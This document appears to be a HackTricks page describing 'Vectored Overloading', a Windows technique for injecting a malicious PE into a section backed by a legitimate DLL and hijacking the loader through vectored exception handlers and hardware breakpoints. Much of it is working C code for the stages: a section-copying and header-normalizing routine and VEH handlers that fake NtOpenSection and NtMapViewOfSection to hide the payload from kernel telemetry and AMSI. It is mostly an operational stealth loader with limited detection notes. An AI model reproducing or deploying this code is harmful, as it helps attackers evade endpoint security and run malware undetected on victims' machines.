Vectored Overloading PE Injection

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Technique overview

Vectored Overloading is a Windows PE injection primitive that combines classic Module Overloading with Vectored Exception Handlers (VEHs) and hardware breakpoints. Instead of patching LoadLibrary or shipping a full custom loader, the attacker:

  1. Creates a SEC_IMAGE section backed by a legitimate DLL (e.g., wmp.dll).
  2. Overwrites the mapped view with a fully laid-out malicious PE while the section object keeps pointing at the benign image on disk.
  3. Registers a VEH and programs the debug registers so that every call to NtOpenSection, NtMapViewOfSection and, optionally, NtClose raises a user-mode breakpoint.
  4. Calls LoadLibrary("amsi.dll") (or any other benign DLL). When the Windows loader reaches those syscalls, the VEH skips the transition into the kernel and hands back the handle and base address of the prepared malicious image instead.

Because the loader still believes it mapped the requested DLL, tools that only inspect a section's backing file see wmp.dll even though memory now holds the attacker's bytes. At the same time, imports and TLS callbacks are still resolved by the real loader, which sharply reduces the amount of custom PE-parsing logic the attacker has to maintain.

Stage 1 – Build the disguised section

  1. Create and map a section for the decoy DLL

```c
HANDLE DecoyFile = CreateFileW(L"C:\\Windows\\System32\\wmp.dll", GENERIC_READ,
    FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);          // backing file for the section
NtCreateSection(&DecoySection, SECTION_ALL_ACCESS, NULL,
    NULL, PAGE_READONLY, SEC_IMAGE, DecoyFile);              // SEC_IMAGE requires a file handle
NtMapViewOfSection(DecoySection, GetCurrentProcess(), &DecoyView, 0, 0,
    NULL, &DecoySize, ViewShare, 0, PAGE_READONLY);          // protections are changed later
```

  2. Copy the malicious PE into that view section by section, respecting SizeOfRawData/VirtualSize, and update the page protections afterwards (PAGE_EXECUTE_READ, PAGE_READWRITE, etc.).
  3. Apply relocations (using DecoyView as the load address) and resolve imports exactly as a reflective loader would. Because the view is already laid out as a SEC_IMAGE mapping, the section alignment and guard pages match what the Windows loader expects later.
  4. Normalize the PE header:
  • If the payload is an EXE, set IMAGE_FILE_HEADER.Characteristics |= IMAGE_FILE_DLL and clear the entry point (after saving it for stage 3) so that LdrpCallTlsInitializers does not jump into EXE-specific startup stubs.
  • DLL payloads can leave their headers unchanged.

At this point the process holds an RWX-capable view whose backing object is still wmp.dll, but the bytes in memory are attacker-controlled.
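The stage-1 steps above (section-by-section copy, header normalization, saving the original entry point) carried out on a constructed PE, as an added example written for this page; it is not code from the page or from any loader it describes. It is portable C: instead of windows.h it reads PE header fields by their documented offsets, and the mapped view is a plain byte buffer standing in for the wmp.dll-backed SEC_IMAGE view, so the NtCreateSection/NtMapViewOfSection setup and the later protection changes are out of scope. The sample file, its section names and contents are constructed, not taken from a real binary.

```c
/* Added example (editor's code, not from the page): stage-1 layout copy and header
 * normalization in portable C. The view buffer stands in for the decoy SEC_IMAGE view. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define IMAGE_FILE_DLL 0x2000u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff; }

/* Offsets relative to the start of IMAGE_NT_HEADERS64 ("PE\0\0") and to a section header. */
enum { NT_NUM_SECTIONS = 6, NT_OPT_SIZE = 20, NT_CHARACTERISTICS = 22, NT_OPT = 24,
       OPT_ENTRY = 16, OPT_SIZE_OF_IMAGE = 56, OPT_SIZE_OF_HEADERS = 60,
       SEC_VSIZE = 8, SEC_VADDR = 12, SEC_RAWSIZE = 16, SEC_RAWPTR = 20, SEC_HDR_LEN = 40 };

/* Copy a file-layout PE into an already-mapped image view, section by section.
 * Returns the number of sections copied, or -1 if the image is malformed or does not fit. */
int map_pe_into_view(const uint8_t *file, size_t file_len, uint8_t *view, size_t view_len) {
    if (file_len < 0x40 || memcmp(file, "MZ", 2) != 0) return -1;
    uint32_t e_lfanew = rd32(file + 0x3c);
    if ((uint64_t)e_lfanew + NT_OPT + OPT_SIZE_OF_HEADERS + 4 > file_len) return -1;
    const uint8_t *nt = file + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return -1;
    uint32_t size_of_headers = rd32(nt + NT_OPT + OPT_SIZE_OF_HEADERS);
    uint32_t size_of_image = rd32(nt + NT_OPT + OPT_SIZE_OF_IMAGE);
    if (size_of_headers > file_len || size_of_headers > size_of_image || size_of_image > view_len) return -1;
    memcpy(view, file, size_of_headers);
    uint16_t nsec = rd16(nt + NT_NUM_SECTIONS);
    const uint8_t *sec = nt + NT_OPT + rd16(nt + NT_OPT_SIZE);
    for (uint16_t i = 0; i < nsec; i++, sec += SEC_HDR_LEN) {
        if ((size_t)(sec + SEC_HDR_LEN - file) > file_len) return -1;
        uint32_t vsize = rd32(sec + SEC_VSIZE), vaddr = rd32(sec + SEC_VADDR);
        uint32_t rawsz = rd32(sec + SEC_RAWSIZE), rawptr = rd32(sec + SEC_RAWPTR);
        uint32_t n = rawsz < vsize ? rawsz : vsize;     /* never spill raw padding past VirtualSize */
        if ((uint64_t)vaddr + vsize > size_of_image || (uint64_t)rawptr + n > file_len) return -1;
        memcpy(view + vaddr, file + rawptr, n);
        memset(view + vaddr + n, 0, vsize - n);          /* uninitialized tail stays zero */
    }
    return (int)nsec;
}

/* Mark an EXE payload as a DLL and clear its entry point so the loader's DllMain/TLS
 * dispatch never jumps into EXE startup code. Returns the original entry RVA so stage 3
 * can still call it; a payload that already carries IMAGE_FILE_DLL is left untouched. */
uint32_t normalize_pe_header(uint8_t *view) {
    uint8_t *nt = view + rd32(view + 0x3c);
    uint32_t oep = rd32(nt + NT_OPT + OPT_ENTRY);
    uint16_t chars = rd16(nt + NT_CHARACTERISTICS);
    if (!(chars & IMAGE_FILE_DLL)) {
        wr16(nt + NT_CHARACTERISTICS, chars | IMAGE_FILE_DLL);
        wr32(nt + NT_OPT + OPT_ENTRY, 0);
    }
    return oep;
}

/* Constructed two-section x64 EXE (not a real binary): .text at RVA 0x1000 backed by 0x200
 * raw bytes at file offset 0x200 (VirtualSize 0x10), .data at RVA 0x2000 backed by 0x400. */
#define SAMPLE_FILE_LEN  0x600
#define SAMPLE_IMAGE_LEN 0x3000
void build_sample_pe(uint8_t *f) {
    memset(f, 0, SAMPLE_FILE_LEN);
    memcpy(f, "MZ", 2); wr32(f + 0x3c, 0x40);
    uint8_t *nt = f + 0x40;
    memcpy(nt, "PE\0\0", 4);
    wr16(nt + 4, 0x8664); wr16(nt + NT_NUM_SECTIONS, 2);
    wr16(nt + NT_OPT_SIZE, 0xf0); wr16(nt + NT_CHARACTERISTICS, 0x0022);  /* EXE: no DLL bit */
    wr16(nt + NT_OPT, 0x20b);                                              /* PE32+ magic */
    wr32(nt + NT_OPT + OPT_ENTRY, 0x1000);
    wr32(nt + NT_OPT + OPT_SIZE_OF_IMAGE, SAMPLE_IMAGE_LEN);
    wr32(nt + NT_OPT + OPT_SIZE_OF_HEADERS, 0x200);
    uint8_t *s = nt + NT_OPT + 0xf0;
    memcpy(s, ".text", 5); wr32(s + SEC_VSIZE, 0x10);  wr32(s + SEC_VADDR, 0x1000);
    wr32(s + SEC_RAWSIZE, 0x200); wr32(s + SEC_RAWPTR, 0x200);
    s += SEC_HDR_LEN;
    memcpy(s, ".data", 5); wr32(s + SEC_VSIZE, 0x100); wr32(s + SEC_VADDR, 0x2000);
    wr32(s + SEC_RAWSIZE, 0x200); wr32(s + SEC_RAWPTR, 0x400);
    for (int i = 0; i < 0x10; i++) f[0x200 + i] = 0x90;   /* NOP sled stands in for code */
    f[0x400] = 0x41;                                       /* one recognisable data byte */
}

/* Whole stage-1 flow on the constructed sample; returns the saved OEP, or -1 on failure. */
long run_stage1_demo(void) {
    static uint8_t file[SAMPLE_FILE_LEN], view[SAMPLE_IMAGE_LEN];
    build_sample_pe(file);
    memset(view, 0, sizeof view);                          /* freshly mapped decoy view */
    if (map_pe_into_view(file, sizeof file, view, sizeof view) != 2) return -1;
    if (view[0x1000] != 0x90 || view[0x1010] != 0 || view[0x2000] != 0x41) return -1;
    uint32_t oep = normalize_pe_header(view);              /* keep this for stage 3 */
    if (!(rd16(view + 0x40 + NT_CHARACTERISTICS) & IMAGE_FILE_DLL)) return -1;
    if (rd32(view + 0x40 + NT_OPT + OPT_ENTRY) != 0) return -1;
    return (long)oep;
}
```

The copy uses min(SizeOfRawData, VirtualSize) and zero-fills the remainder, which is what keeps file-alignment padding from overrunning the region the loader will later treat as the section. normalize_pe_header is idempotent: a second call returns 0 because the entry point has already been cleared, which is why the injector must keep the first return value.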

Stage 2 – Hijack the loader with VEHs

  1. Register a VEH and arm hardware breakpoints: load the address of ntdll!NtOpenSection into Dr0 (or another debug register) and set DR7 so that every execution of it raises STATUS_SINGLE_STEP (EXCEPTION_SINGLE_STEP). Repeat for NtMapViewOfSection and, optionally, NtClose.
  2. Trigger DLL loading with LoadLibrary("amsi.dll"). LdrLoadDll eventually calls NtOpenSection to obtain a handle to the real section.
  3. VEH hook for NtOpenSection:
  • Locate the [out] PHANDLE SectionHandle argument (the first parameter: RCX on x64, the first stack slot on x86).
  • Write the handle of the DecoySection created earlier into it.
  • Set the return register to STATUS_SUCCESS and advance RIP/EIP to the stub's ret instruction so the kernel is never entered.
  • Re-arm the hardware breakpoint to watch the upcoming NtMapViewOfSection.
  4. VEH hook for NtMapViewOfSection:
  • Overwrite the [out] PVOID *BaseAddress (plus the size/protection outputs) with the address of the already-prepared malicious view.
  • Skip the syscall exactly as before.
  5. (Optional) VEH hook for NtClose confirms that the fake section handle is cleaned up, preventing resource leaks and serving as a final sanity check.

Because the hijacked syscalls never execute, kernel-side callbacks (ETW-TI, minifilters, etc.) see no NtOpenSection/NtMapViewOfSection events for the payload, which cuts telemetry significantly. From the loader's point of view everything succeeded and amsi.dll is in memory, so it carries on with import resolution and TLS processing against the attacker's bytes. The reduction is partial rather than total: the genuine NtCreateSection/NtMapViewOfSection calls for the wmp.dll decoy in stage 1, the writes into that view and the later NtProtectVirtualMemory calls are all still visible to kernel callbacks, and a scanner that compares a mapped image against its backing file on disk will notice that the wmp.dll view no longer matches wmp.dll.
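The stage-2 hook logic as an added example, written for this page rather than taken from it or from any real loader. The CONTEXT fields the hooks touch (Rip, Rax, Rcx, R8, Rsp, Dr6, EFlags) are mirrored in a small HookContext struct so the decision logic compiles and runs on any OS; the #ifdef _WIN32 wrapper shows how a real VEH would feed it from ContextRecord. find_ret_after_syscall locates the ret to resume at by scanning for the syscall; ret sequence of an x64 ntdll stub. The stub bytes, handle values and addresses used in the test are constructed, and the NtClose hook and breakpoint arming through SetThreadContext are described only in comments.

```c
/* Added example (editor's code, not from the page): stage-2 VEH hook logic in portable C.
 * Only the x64 CONTEXT fields the hooks use are mirrored, so the logic runs without Windows. */
#include <stdint.h>
#include <stddef.h>

#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS 0x00000000u
#endif
#ifndef EXCEPTION_CONTINUE_SEARCH
#define EXCEPTION_CONTINUE_SEARCH    0
#define EXCEPTION_CONTINUE_EXECUTION (-1)
#endif
#define EFLAGS_RF       0x10000u   /* resume flag: suppress the execute breakpoint once */
#define BP_OPEN_SECTION 0          /* Dr0 -> ntdll!NtOpenSection */
#define BP_MAP_VIEW     1          /* Dr1 -> ntdll!NtMapViewOfSection */

/* DR7 bits enabling slot n as an execute breakpoint: local-enable bit 2n set, the RW field
 * (bits 16+4n) left 00 = execute and the LEN field (bits 18+4n) left 00 = one byte. */
uint64_t dr7_exec_breakpoint(int slot) { return 1ull << (2 * slot); }

/* Offset of the `ret` that follows `syscall` (0f 05 c3) in an x64 ntdll Nt* stub, or -1.
 * RIP is moved there so the stub returns to the loader without ever executing the syscall. */
int find_ret_after_syscall(const uint8_t *stub, size_t len) {
    for (size_t i = 0; i + 2 < len; i++)
        if (stub[i] == 0x0f && stub[i + 1] == 0x05 && stub[i + 2] == 0xc3) return (int)(i + 2);
    return -1;
}

typedef struct {                       /* subset of the x64 CONTEXT the hooks read and write */
    uint64_t Rip, Rax, Rcx, R8, Rsp, Dr6, EFlags;
} HookContext;

typedef struct {
    uint64_t open_section_ret, map_view_ret;  /* `ret` addresses found with find_ret_after_syscall */
    uint64_t decoy_section;                   /* handle of the wmp.dll-backed section from stage 1 */
    uint64_t decoy_view, decoy_view_size;     /* view already overwritten with the payload */
    int open_seen, map_seen;
} HookState;

/* Invoked for EXCEPTION_SINGLE_STEP; Dr6 bits 0..3 report which debug register fired. */
long vectored_overloading_handler(HookContext *ctx, HookState *st) {
    if (ctx->Dr6 & (1u << BP_OPEN_SECTION)) {
        /* NtOpenSection: the first argument (RCX) is the out PHANDLE; hand back the decoy. */
        *(uint64_t *)(uintptr_t)ctx->Rcx = st->decoy_section;
        ctx->Rax = STATUS_SUCCESS;             /* the loader checks NT_SUCCESS(status) */
        ctx->Rip = st->open_section_ret;       /* resume at ret: the kernel is never entered */
        st->open_seen = 1;
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    if (ctx->Dr6 & (1u << BP_MAP_VIEW)) {
        /* NtMapViewOfSection(SectionHandle=RCX, ProcessHandle=RDX, PVOID *BaseAddress=R8,
         * ZeroBits=R9, CommitSize=[rsp+0x28], SectionOffset=[rsp+0x30], PSIZE_T ViewSize=[rsp+0x38],
         * ...). Only the mapping of our decoy handle is hijacked; any other mapping runs for real. */
        if (!st->open_seen || ctx->Rcx != st->decoy_section) {
            ctx->EFlags |= EFLAGS_RF;          /* step over the breakpoint and run the real stub */
            return EXCEPTION_CONTINUE_EXECUTION;
        }
        *(uint64_t *)(uintptr_t)ctx->R8 = st->decoy_view;
        uint64_t *view_size = *(uint64_t **)(uintptr_t)(ctx->Rsp + 0x38);
        if (view_size) *view_size = st->decoy_view_size;
        ctx->Rax = STATUS_SUCCESS;
        ctx->Rip = st->map_view_ret;
        st->map_seen = 1;
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;          /* some other single-step exception: not ours */
}

#ifdef _WIN32
/* Real VEH glue (x64): copy the fields in, run the logic, copy the results back. Arm it first
 * with Dr0/Dr1 = the two stub addresses and Dr7 = dr7_exec_breakpoint(0) | dr7_exec_breakpoint(1)
 * through SetThreadContext with ContextFlags = CONTEXT_DEBUG_REGISTERS, then register veh_entry
 * with AddVectoredExceptionHandler(1, veh_entry) before calling LoadLibrary. */
#include <windows.h>
static HookState g_state;
LONG CALLBACK veh_entry(PEXCEPTION_POINTERS ep) {
    if (ep->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) return EXCEPTION_CONTINUE_SEARCH;
    CONTEXT *c = ep->ContextRecord;
    HookContext h = { c->Rip, c->Rax, c->Rcx, c->R8, c->Rsp, c->Dr6, c->EFlags };
    long r = vectored_overloading_handler(&h, &g_state);
    c->Rip = h.Rip; c->Rax = h.Rax; c->EFlags = h.EFlags;
    return r;
}
#endif
```

Two details matter in practice. The handler only hijacks NtMapViewOfSection when the section handle in RCX is the decoy handle it returned a moment earlier, so other mappings in the process (the loader maps more than one thing) are passed through with the resume flag set rather than being corrupted. And setting Rax is not optional: LdrLoadDll checks the NTSTATUS of both calls, and a stale value in RAX makes the "successful" load fail before the attacker's bytes are ever used.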

Stage 3 – Run the payload

  • EXE payload: once relocations are done, the injector simply jumps to the original entry point saved before the header was normalized. Where the loader thinks it is calling DllMain, custom code instead performs an EXE-style entry.
  • DLL payload / Node.js addon: locate and call the intended export (Kidkadi exposes a named function to JavaScript). Because the module is already registered in LdrpModuleBaseAddressIndex, subsequent lookups treat it as a benign DLL.

When combined with a Node.js native addon (.node file), the heavy Windows-internals work stays out of the JavaScript layer, letting the threat actor ship the same loader inside many different obfuscated Node wrappers.
